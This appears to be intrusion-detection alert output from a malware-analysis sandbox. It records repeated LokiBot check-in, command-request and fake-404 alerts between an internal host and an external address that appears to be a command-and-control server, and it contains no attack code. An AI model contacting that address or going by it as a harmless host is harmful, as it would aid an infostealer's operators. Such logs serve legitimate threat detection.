              2024-10-01T10:56:12.182284+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979745.66.231.24280TCP
              2024-10-01T10:56:12.182284+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979745.66.231.24280TCP
              2024-10-01T10:56:12.873678+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979745.66.231.24280TCP
              2024-10-01T10:56:12.873678+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979745.66.231.24280TCP
              2024-10-01T10:56:13.048624+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979845.66.231.24280TCP
              2024-10-01T10:56:13.048624+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979845.66.231.24280TCP
              2024-10-01T10:56:13.048624+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979845.66.231.24280TCP
              2024-10-01T10:56:13.732989+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979845.66.231.24280TCP
              2024-10-01T10:56:13.732989+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979845.66.231.24280TCP
              2024-10-01T10:56:13.740120+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449798TCP
              2024-10-01T10:56:13.911144+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979945.66.231.24280TCP
              2024-10-01T10:56:13.911144+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979945.66.231.24280TCP
              2024-10-01T10:56:13.911144+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979945.66.231.24280TCP
              2024-10-01T10:56:14.662421+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979945.66.231.24280TCP
              2024-10-01T10:56:14.662421+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979945.66.231.24280TCP
              2024-10-01T10:56:14.668285+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449799TCP
              2024-10-01T10:56:14.813722+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980045.66.231.24280TCP
              2024-10-01T10:56:14.813722+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980045.66.231.24280TCP
              2024-10-01T10:56:14.813722+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980045.66.231.24280TCP
              2024-10-01T10:56:15.549540+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980045.66.231.24280TCP
              2024-10-01T10:56:15.549540+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980045.66.231.24280TCP
              2024-10-01T10:56:15.557520+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449800TCP
              2024-10-01T10:56:15.707475+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980145.66.231.24280TCP
              2024-10-01T10:56:15.707475+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980145.66.231.24280TCP
              2024-10-01T10:56:15.707475+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980145.66.231.24280TCP
              2024-10-01T10:56:16.583958+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980145.66.231.24280TCP
              2024-10-01T10:56:16.583958+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980145.66.231.24280TCP
              2024-10-01T10:56:16.590966+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449801TCP
              2024-10-01T10:56:16.758460+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980245.66.231.24280TCP
              2024-10-01T10:56:16.758460+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980245.66.231.24280TCP
              2024-10-01T10:56:16.758460+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980245.66.231.24280TCP
              2024-10-01T10:56:17.494274+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980245.66.231.24280TCP
              2024-10-01T10:56:17.494274+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980245.66.231.24280TCP
              2024-10-01T10:56:17.501549+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449802TCP
              2024-10-01T10:56:17.789425+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980345.66.231.24280TCP
              2024-10-01T10:56:17.789425+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980345.66.231.24280TCP
              2024-10-01T10:56:17.789425+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980345.66.231.24280TCP
              2024-10-01T10:56:21.570507+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980345.66.231.24280TCP
              2024-10-01T10:56:21.570507+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980345.66.231.24280TCP
              2024-10-01T10:56:21.575286+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449803TCP
              2024-10-01T10:56:21.729047+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980445.66.231.24280TCP
              2024-10-01T10:56:21.729047+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980445.66.231.24280TCP
              2024-10-01T10:56:21.729047+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980445.66.231.24280TCP
              2024-10-01T10:56:22.785811+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980445.66.231.24280TCP
              2024-10-01T10:56:22.785811+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980445.66.231.24280TCP
              2024-10-01T10:56:22.790596+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449804TCP
              2024-10-01T10:56:22.932407+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980545.66.231.24280TCP
              2024-10-01T10:56:22.932407+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980545.66.231.24280TCP
              2024-10-01T10:56:22.932407+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980545.66.231.24280TCP
              2024-10-01T10:56:23.757565+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980545.66.231.24280TCP
              2024-10-01T10:56:23.757565+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980545.66.231.24280TCP
              2024-10-01T10:56:23.762391+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449805TCP
              2024-10-01T10:56:23.914707+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980645.66.231.24280TCP
              2024-10-01T10:56:23.914707+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980645.66.231.24280TCP
              2024-10-01T10:56:23.914707+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980645.66.231.24280TCP
              2024-10-01T10:56:27.643202+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980645.66.231.24280TCP
              2024-10-01T10:56:27.643202+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980645.66.231.24280TCP
              2024-10-01T10:56:27.648158+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449806TCP
              2024-10-01T10:56:27.790640+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980745.66.231.24280TCP
              2024-10-01T10:56:27.790640+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980745.66.231.24280TCP
              2024-10-01T10:56:27.790640+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980745.66.231.24280TCP
              2024-10-01T10:56:28.562142+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980745.66.231.24280TCP
              2024-10-01T10:56:28.562142+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980745.66.231.24280TCP
              2024-10-01T10:56:28.566911+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449807TCP
              2024-10-01T10:56:28.717307+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980845.66.231.24280TCP
              2024-10-01T10:56:28.717307+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980845.66.231.24280TCP
              2024-10-01T10:56:28.717307+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980845.66.231.24280TCP
              2024-10-01T10:56:29.397053+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980845.66.231.24280TCP
              2024-10-01T10:56:29.397053+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980845.66.231.24280TCP
              2024-10-01T10:56:29.402143+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449808TCP
              2024-10-01T10:56:29.548372+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980945.66.231.24280TCP
              2024-10-01T10:56:29.548372+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980945.66.231.24280TCP
              2024-10-01T10:56:29.548372+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980945.66.231.24280TCP
              2024-10-01T10:56:30.238349+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980945.66.231.24280TCP
              2024-10-01T10:56:30.238349+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980945.66.231.24280TCP
              2024-10-01T10:56:30.243287+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449809TCP
              2024-10-01T10:56:30.403711+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981045.66.231.24280TCP
              2024-10-01T10:56:30.403711+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981045.66.231.24280TCP
              2024-10-01T10:56:30.403711+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981045.66.231.24280TCP
              2024-10-01T10:56:31.057616+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981045.66.231.24280TCP
              2024-10-01T10:56:31.057616+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981045.66.231.24280TCP
              2024-10-01T10:56:31.101297+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449810TCP
              2024-10-01T10:56:31.360698+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981145.66.231.24280TCP
              2024-10-01T10:56:31.360698+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981145.66.231.24280TCP
              2024-10-01T10:56:31.360698+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981145.66.231.24280TCP
              2024-10-01T10:56:32.074355+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981145.66.231.24280TCP
              2024-10-01T10:56:32.074355+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981145.66.231.24280TCP
              2024-10-01T10:56:32.079313+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449811TCP
              2024-10-01T10:56:32.244487+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981245.66.231.24280TCP
              2024-10-01T10:56:32.244487+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981245.66.231.24280TCP
              2024-10-01T10:56:32.244487+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981245.66.231.24280TCP
              2024-10-01T10:56:32.917597+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981245.66.231.24280TCP
              2024-10-01T10:56:32.917597+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981245.66.231.24280TCP
              2024-10-01T10:56:32.922481+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449812TCP
              2024-10-01T10:56:33.078751+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981345.66.231.24280TCP
              2024-10-01T10:56:33.078751+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981345.66.231.24280TCP
              2024-10-01T10:56:33.078751+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981345.66.231.24280TCP
              2024-10-01T10:56:33.794817+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981345.66.231.24280TCP
              2024-10-01T10:56:33.794817+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981345.66.231.24280TCP
              2024-10-01T10:56:33.845002+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449813TCP
              2024-10-01T10:56:34.264055+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981445.66.231.24280TCP
              2024-10-01T10:56:34.264055+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981445.66.231.24280TCP
              2024-10-01T10:56:34.264055+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981445.66.231.24280TCP
              2024-10-01T10:56:34.954399+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981445.66.231.24280TCP
              2024-10-01T10:56:34.954399+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981445.66.231.24280TCP
              2024-10-01T10:56:34.959453+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449814TCP
              2024-10-01T10:56:35.118822+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981545.66.231.24280TCP
              2024-10-01T10:56:35.118822+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981545.66.231.24280TCP
              2024-10-01T10:56:35.118822+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981545.66.231.24280TCP
              2024-10-01T10:56:35.847108+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981545.66.231.24280TCP
              2024-10-01T10:56:35.847108+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981545.66.231.24280TCP
              2024-10-01T10:56:35.853992+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449815TCP
              2024-10-01T10:56:36.007121+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981645.66.231.24280TCP
              2024-10-01T10:56:36.007121+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981645.66.231.24280TCP
              2024-10-01T10:56:36.007121+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981645.66.231.24280TCP
              2024-10-01T10:56:36.897917+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981645.66.231.24280TCP
              2024-10-01T10:56:36.897917+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981645.66.231.24280TCP
              2024-10-01T10:56:36.903028+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449816TCP
              2024-10-01T10:56:37.076989+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981745.66.231.24280TCP
              2024-10-01T10:56:37.076989+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981745.66.231.24280TCP
              2024-10-01T10:56:37.076989+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981745.66.231.24280TCP
              2024-10-01T10:56:37.827181+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981745.66.231.24280TCP
              2024-10-01T10:56:37.827181+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981745.66.231.24280TCP
              2024-10-01T10:56:37.832349+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449817TCP
              2024-10-01T10:56:37.993838+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981845.66.231.24280TCP
              2024-10-01T10:56:37.993838+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981845.66.231.24280TCP
              2024-10-01T10:56:37.993838+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981845.66.231.24280TCP
              2024-10-01T10:56:38.657817+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981845.66.231.24280TCP
              2024-10-01T10:56:38.657817+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981845.66.231.24280TCP
              2024-10-01T10:56:38.662708+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449818TCP
              2024-10-01T10:56:38.817577+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981945.66.231.24280TCP
              2024-10-01T10:56:38.817577+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981945.66.231.24280TCP
              2024-10-01T10:56:38.817577+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981945.66.231.24280TCP
              2024-10-01T10:56:39.503641+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981945.66.231.24280TCP
              2024-10-01T10:56:39.503641+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981945.66.231.24280TCP
              2024-10-01T10:56:39.508520+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449819TCP
              2024-10-01T10:56:39.675484+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982045.66.231.24280TCP
              2024-10-01T10:56:39.675484+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982045.66.231.24280TCP
              2024-10-01T10:56:39.675484+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982045.66.231.24280TCP
              2024-10-01T10:56:40.380881+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982045.66.231.24280TCP
              2024-10-01T10:56:40.380881+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982045.66.231.24280TCP
              2024-10-01T10:56:40.385790+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449820TCP
              2024-10-01T10:56:40.543640+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982145.66.231.24280TCP
              2024-10-01T10:56:40.543640+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982145.66.231.24280TCP
              2024-10-01T10:56:40.543640+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982145.66.231.24280TCP
              2024-10-01T10:56:41.310664+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982145.66.231.24280TCP
              2024-10-01T10:56:41.310664+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982145.66.231.24280TCP
              2024-10-01T10:56:41.315506+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449821TCP
              2024-10-01T10:56:41.469900+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982245.66.231.24280TCP
              2024-10-01T10:56:41.469900+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982245.66.231.24280TCP
              2024-10-01T10:56:41.469900+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982245.66.231.24280TCP
              2024-10-01T10:56:42.196431+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982245.66.231.24280TCP
              2024-10-01T10:56:42.196431+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982245.66.231.24280TCP
              2024-10-01T10:56:42.201279+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449822TCP
              2024-10-01T10:56:42.355681+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982345.66.231.24280TCP
              2024-10-01T10:56:42.355681+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982345.66.231.24280TCP
              2024-10-01T10:56:42.355681+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982345.66.231.24280TCP
              2024-10-01T10:56:43.188728+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982345.66.231.24280TCP
              2024-10-01T10:56:43.188728+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982345.66.231.24280TCP
              2024-10-01T10:56:43.193663+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449823TCP
              2024-10-01T10:56:43.346923+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982445.66.231.24280TCP
              2024-10-01T10:56:43.346923+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982445.66.231.24280TCP
              2024-10-01T10:56:43.346923+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982445.66.231.24280TCP
              2024-10-01T10:56:44.087856+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982445.66.231.24280TCP
              2024-10-01T10:56:44.087856+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982445.66.231.24280TCP
              2024-10-01T10:56:44.092775+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449824TCP
              2024-10-01T10:56:44.250217+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982545.66.231.24280TCP
              2024-10-01T10:56:44.250217+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982545.66.231.24280TCP
              2024-10-01T10:56:44.250217+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982545.66.231.24280TCP
              2024-10-01T10:56:44.963211+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982545.66.231.24280TCP
              2024-10-01T10:56:44.963211+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982545.66.231.24280TCP
              2024-10-01T10:56:44.968018+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449825TCP
              2024-10-01T10:56:45.124436+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982645.66.231.24280TCP
              2024-10-01T10:56:45.124436+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982645.66.231.24280TCP
              2024-10-01T10:56:45.124436+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982645.66.231.24280TCP
              2024-10-01T10:56:45.843694+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982645.66.231.24280TCP
              2024-10-01T10:56:45.843694+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982645.66.231.24280TCP
              2024-10-01T10:56:45.848547+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449826TCP
              2024-10-01T10:56:46.001925+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982745.66.231.24280TCP
              2024-10-01T10:56:46.001925+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982745.66.231.24280TCP
              2024-10-01T10:56:46.001925+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982745.66.231.24280TCP
              2024-10-01T10:56:46.767886+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982745.66.231.24280TCP
              2024-10-01T10:56:46.767886+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982745.66.231.24280TCP
              2024-10-01T10:56:46.772733+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449827TCP
              2024-10-01T10:56:46.932311+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982845.66.231.24280TCP
              2024-10-01T10:56:46.932311+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982845.66.231.24280TCP
              2024-10-01T10:56:46.932311+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982845.66.231.24280TCP
              2024-10-01T10:56:47.568144+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982845.66.231.24280TCP
              2024-10-01T10:56:47.568144+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982845.66.231.24280TCP
              2024-10-01T10:56:47.572926+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449828TCP
              2024-10-01T10:56:47.715173+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982945.66.231.24280TCP
              2024-10-01T10:56:47.715173+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982945.66.231.24280TCP
              2024-10-01T10:56:47.715173+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982945.66.231.24280TCP
              2024-10-01T10:56:48.474448+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982945.66.231.24280TCP
              2024-10-01T10:56:48.474448+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982945.66.231.24280TCP
              2024-10-01T10:56:48.479548+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449829TCP
              2024-10-01T10:56:48.656357+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983045.66.231.24280TCP
              2024-10-01T10:56:48.656357+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983045.66.231.24280TCP
              2024-10-01T10:56:48.656357+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983045.66.231.24280TCP
              2024-10-01T10:56:49.332110+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983045.66.231.24280TCP
              2024-10-01T10:56:49.332110+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983045.66.231.24280TCP
              2024-10-01T10:56:49.343834+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449830TCP
              2024-10-01T10:56:49.497277+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983145.66.231.24280TCP
              2024-10-01T10:56:49.497277+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983145.66.231.24280TCP
              2024-10-01T10:56:49.497277+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983145.66.231.24280TCP
              2024-10-01T10:56:50.153802+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983145.66.231.24280TCP
              2024-10-01T10:56:50.153802+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983145.66.231.24280TCP
              2024-10-01T10:56:50.158654+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449831TCP
              2024-10-01T10:56:50.315483+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983245.66.231.24280TCP
              2024-10-01T10:56:50.315483+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983245.66.231.24280TCP
              2024-10-01T10:56:50.315483+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983245.66.231.24280TCP
              2024-10-01T10:56:50.984561+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983245.66.231.24280TCP
              2024-10-01T10:56:50.984561+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983245.66.231.24280TCP
              2024-10-01T10:56:50.989482+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449832TCP
              2024-10-01T10:56:51.139744+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983345.66.231.24280TCP
              2024-10-01T10:56:51.139744+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983345.66.231.24280TCP
              2024-10-01T10:56:51.139744+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983345.66.231.24280TCP
              2024-10-01T10:56:51.881052+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983345.66.231.24280TCP
              2024-10-01T10:56:51.881052+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983345.66.231.24280TCP
              2024-10-01T10:56:51.885896+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449833TCP
              2024-10-01T10:56:52.030835+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983445.66.231.24280TCP
              2024-10-01T10:56:52.030835+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983445.66.231.24280TCP
              2024-10-01T10:56:52.030835+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983445.66.231.24280TCP
              2024-10-01T10:56:52.776756+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983445.66.231.24280TCP
              2024-10-01T10:56:52.776756+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983445.66.231.24280TCP
              2024-10-01T10:56:52.789437+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449834TCP
              2024-10-01T10:56:52.933070+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983545.66.231.24280TCP
              2024-10-01T10:56:52.933070+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983545.66.231.24280TCP
              2024-10-01T10:56:52.933070+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983545.66.231.24280TCP
              2024-10-01T10:56:53.773058+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983545.66.231.24280TCP
              2024-10-01T10:56:53.773058+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983545.66.231.24280TCP
              2024-10-01T10:56:53.777994+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449835TCP
              2024-10-01T10:56:53.939406+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983645.66.231.24280TCP
              2024-10-01T10:56:53.939406+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983645.66.231.24280TCP
